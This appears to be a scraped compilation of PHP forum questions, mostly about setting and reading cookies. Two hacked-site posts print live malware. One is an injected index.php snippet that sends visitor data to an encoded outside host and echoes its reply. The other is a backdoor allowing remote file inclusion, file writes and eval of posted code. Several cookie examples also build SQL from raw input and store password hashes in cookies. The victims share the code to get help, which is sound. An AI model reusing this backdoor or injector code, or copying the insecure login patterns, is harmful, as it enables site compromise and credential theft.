PHP - I Have Been Hacked And I Am Trying To Use Cookies To Help With This Issue

The code below was inserted into every single index.php on one of my clients sites.  It went through and every single index.php page (in each folder) had that following code put in.  It was
strange. As far as I can tell there are no FTP logs, besides my own IP.   This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a
full security audit yet.  What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?
is inserted right after it.  I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

Any advice on how this is generally done, and anyone with similar issues?
Code: [Select]
<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

I have a php form submission on this website: www.judelawllc.com

There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening?

Thank you in advance!

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):


<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Hey, friends.  I have some trouble on the server front.  My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit.  I'm looking for a way to search for any and all php files contained in multiple directories with specific names.  For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"?  I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep.  I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. 

Any and all help is appreciated.  Hackers suck.

Hey all,

http://www.adamrowden.co.uk/photo-searchr.asp


If you visit this link, you'll see on the left side you have a few photos. If you click a photo from that page and then go back to the link i've provided you'll see that it shows you your 'recently viewed photos'. I'm wanting to do exactly that and need some pointers on how i would!?

I'd be very grateful for any help

Thanks, Jimmy m

hello;

it seems strange that php can set cookies, since php is on the serer-side, but the cookies are on the client-side ... is there something that I am missing?

This is prob a stupid question.. but i've always wondered..   When deleting a cookie why do we use  why do we use: setcookie($name, '', time() - 3600, "/", "", 0);   when this works just fine: setcookie($name, '', 0, "/", "", 0);       isn't the time() just a waste of space?     I ask this because everywhere i look i see: setcookie($name, '', time() -3600 , "/", "", 0);

I'm trying to write a script that allows the user to select their personal settings for the site.  They can pick the color of their background, link color, link hover color and the header color.  the first file is supposed to use the defaults, blue for the links, orange for the link hover color red for the background and blue for the header.  the second file is supposed to configure the cookie variables to store the values entered by the user and the third file i'm supposed to modify the internal stylesheet to utilize the values stored in the session variables. I tried to set each of the values in file two but i think i messed it up.  I dont know how to modify the stylesheet to accept and change to the values of the cookies...Please help
here are the files
file1.php
Code: [Select]
<?php
//Handle the form if it has been submitted:
if (isset($_POST['background_color'], $_POST['link_color'], $_POST['link_hover_color'],
$_POST['header_color'])){

//send the cookies:
setcookie('background_color', $_POST['background_color'], time()+10000000);
setcookie('link_color', $_POST['link_color'], time()+10000000);
setcookie('link_hover_color', $_POST['link_hover_color'], time()+10000000);
setcookie('header_color', $_POST['header_color'], time()=10000000);

//Message to be printed later:
$msg = '<p>Your settings have been entered! Click <a href="file2.php">here</a> to see them in action.</p>';


}
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>File1</title>

<style type="text/css">

<!-- These are the styles the session (if it exists) should configure -->

a:link {color:blue;}
a:hover {color:orange;}
body {background-color:red}
h1 {color:blue; text-align:center;}
   
</style>

</head>
<body>
<?php
//if the cookies were sent print a message
if (isset($msg)){
print $msg;
}

?>

<div><p>Please complete this form to configure the appearance of this website:</p>

<form action="File2.php" method="post">
<select name="background_color">
<option value="">Background Color</option>
<option value="FF6600">Orange</option>
<option value="CC00CC">Purple</option>
<option value="FFFF00">Yellow</option>
<option value="00FF00">Green</option>
<option value="FF0066">Pink</option>
<option value="000099">Blue</option>
</select>
<select name="link_color">
<option value="">Link Color</option>
<option value="FF6600">Orange</option>
<option value="CC00CC">Purple</option>
<option value="FFFF00">Yellow</option>
<option value="00FF00">Green</option>
<option value="FF0066">Pink</option>
<option value="000099">Blue</option>
</select>
<select name="link_hover_color">
<option value="">Link Hover Color</option>
<option value="FF6600">Orange</option>
<option value="CC00CC">Purple</option>
<option value="FFFF00">Yellow</option>
<option value="00FF00">Green</option>
<option value="FF0066">Pink</option>
<option value="000099">Blue</option>
</select>
<select name="header_color">
<option value="">Header Color</option>
<option value="FF6600">Orange</option>
<option value="CC00CC">Purple</option>
<option value="FFFF00">Yellow</option>
<option value="00FF00">Green</option>
<option value="FF0066">Pink</option>
<option value="000099">Blue</option>
</select>


<input type="submit" name="submit" value="Configure!" />

</form>
</div>
</body>
</html>
file2.php
Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>File2</title>
</head>
<body>
<div>

<?php
include('file1.php');
//check for a background color
if (isset($_COOKIE['background_color'])){
print "\body: #" . htmlentities($_COOKIE['background_color']) . ";\n";
}else{
print "\body: #c00";
}

//check for a link_color
if (isset($_COOKIE['link_color'])){
print "\a:link: #" . htmlentities($_COOKIE['link_color']) . ";\n";
}else{
print "\a:link: #00f";
}

//check for a link_hover color:
if (isset($_COOKIE['link_hover_color'])){
print "a\:hover: #" . htmlentities($_COOKIE['link_hover_color']) . ";\n";
}

//Check for a header color
if (isset($_COOKIE['header_color'])){
print "\h1: #" . htmlentities($_COOKIE['header_color']). ";\n";
}
?>

Your settings have been updated. <a href="File3.php">Click here</a> to continue.

<br /><br />

</div>
</body>
</html>
file3.php
Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>File3</title>

<style type="text/css">

<!-- These are the styles the session should configure -->

a:link {color:blue;}
a:hover {color:orange;}
body {background-color:red}
h1 {color:blue; text-align:center;}
   
</style>

</head>
<body>
<div>


<h1>Welcome to YOUR pretty website</h1>

<a href = "File1.php">Click here</a> to go back and start over!</a>



</div>
</body>
</html>

I'm pretty sure i did in file2 what i was supposed to do in file3
im totally confused

This has been driving me crazy for hours!
I am trying to set a cookie:  setcookie("username", $_POST['user']); 
And for a while it wasn't working, then it started randomly working. Now, when I try to use  if(isset($_COOKIE['username']))
PHP is saying the cookie does not exist. PLEASE help! Thanks.

Hello all,

I hope someone can shed some light/point me in the right direction.

I have a site that allows you to search for a customer then view and change their detail.

page 1 has a search box for name entry.
page 2 displays all the matches retrieved from a db table that match. The user selects which customer is the correct 1 and sets a cookie containing the selected customers unique id.
page 3 allows changing of the customers details.

now the problem I have:
If a user navigates to page 3 and has a customers details on page for viewing all is well.
If they open a new tab (leaving page 3 open on first tab) and go to page 1, search for another customer, page 2 select another customer (which overwrites cookie) then to page 3. They now have two tabs open on page 3 both displaying different customer details.
If they return to the first tab and change some detail, when they save it actually updates the users details that corrispond to the second tab. I know this is because the cookie has been changed that holds the unique id that is required for the update query.

How can I prevent this?
I've looked at sessions but it would seem the same issue would excist. Am I wrong?

Many Thanks

I hope I made sense.

Okay im having a problem with cookies so if anyone can help i would be grateful.

When you login you can choose how long to stay in for. For testing purposes the choices a

Forever 1 Hour 1 Day Never
Based on your choice i am setting the cookie expiration as follows:

if ($_POST['remember_me'] == '1')
{
setcookie('remember', time() + 99999999999999);
}
elseif ($_POST['remember_me'] == '3600')
{
setcookie('remember', time() + 3600);
}
elseif ($_POST['remember_me'] == '84600')
{
setcookie('remember', time() + 84600);
}
elseif ($_POST['remember_me'] == '0')
{
setcookie('remember');
}
echo $_COOKIE['remember']; 
}

Then for testing I am echoing the cookie at the head of the document:

echo "Cookie: " . @$_COOKIE['remember'];

The problem is that when the browser is closed the cookie is gone. Only the last option "never" is set as a session cookie which means the others
should stay active even when the browser is closed shouldnt they?

Anything i have missed here?

i'm trying to set a cookie value to a result from a query, but its not working. all of the other cookies are being set, except for one. any ideas why?

<?php 

//Checks if there is a login cookie 
if(isset($_COOKIE['ID_forum'])) 

//if there is, it logs you in and directs you to the members page 
{ 
$username = $_COOKIE['ID_forum']; 
$pass = $_COOKIE['Key_forum']; 
$user_level = $_COOKIE['Forum_level'];
$check = mysql_query("SELECT * FROM users WHERE username = '$username'")or die(mysql_error()); 
while($info = mysql_fetch_array( $check )) 
{ 
if ($pass != $info['password']) 
{ 
} 
else 
{ 
header("Location: index.php"); 
} 
} 
} 
 if (isset($_POST['submit'])) { // if form has been submitted 
// makes sure they filled it in 
if(!$_POST['username'] | !$_POST['pass']) { 
die('
<h2> You did not fill in all of the fields</h2>
<p<a href="login.php">Return to login page</a>
'); 
} 
// checks it against the database 
$check = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."'")or die(mysql_error()); 
//Gives error if user dosen't exist 
$check2 = mysql_num_rows($check); 
if ($check2 == 0) { 
die('
<h2> That user does not exist in our database.<br/> </h2>
<p<a href="login.php">Return to login page</a>
'); 
} 
while($info = mysql_fetch_array( $check )) 
{ 
$_POST['pass'] = mysql_real_escape_string($_POST['pass']); 
$info['password'] = mysql_real_escape_string($info['password']); 
$_POST['pass'] = md5($_POST['pass']); 
//gives error if the password is wrong 
if ($_POST['pass'] != $info['password']) { 
die('
<h2> Incorrect password, please try again</h2>
<p<a href="login.php">Return to login page</a>
'); 
} 
else 
{ 
$_POST['username'] = mysql_real_escape_string($_POST['username']);
$_POST['user_level'] = mysql_real_escape_string($_POST['user_level']); 
$hour = time() + 3600; 

setcookie(ID_forum, $_POST['username'], $hour); 
setcookie(Key_forum, $_POST['pass'], $hour);
setcookie(Forum_level, $_POST['user_level'], $hour);  //this cookie is not being set
setcookie(test, 'test cookie', $hour);  // testing that cookie is being set - this works

header("Location: index.php"); 
$query2 = mysql_query("SELECT * FROM users WHERE username = ".$_POST['username'])or die(mysql_error());   
setcookie(Level_forum, $query2['user_level'], $hour);
} 
} 
} 
else 
{     
// if they are not logged in 
?> 

//form code is here. i have not included it to save space
<?php 
} 

?> 

Thanks

When a user logs in it sets a cookie with their user id and sets the time they choose(either a session cookie or a cookie lasting one year for users who wish to stay logged in). when they select to stay logged in forever and close the browser the next time they open it, it tells them they arent logged in. however when they go to a new page they appear to be logged in. What i dont understand is why they have to go to a new page for it to say they are logged in. Here is the code which runs everytime the site is load


if (isset($_COOKIE['uid']))
{
    $user->setup($_COOKIE['uid']);
}


user setup basically selects their info from the database and sets their username and other info to variables.

Anyone know a better way to do this?

Im trying to use the following code;


if($login_Remember) { /* Check if Remember Me was set */
      setcookie('login_ID', $row['ID'], time()+3600 * 24 * 30);
      setcookie('login_Name', $row['Name'], time()+3600 * 24 * 30);
      setcookie('login_Access', $row['Value'], time()+3600 * 24 * 30);
}
header("Location: index.php");


When i try to use it, the only cookie thats registered is the bottom on "login_Access". None of the others are. I have tried everything but nothings working.

I dont get any error messages.

Using PHP v5.3.3 on IIS

Please help.

Thanks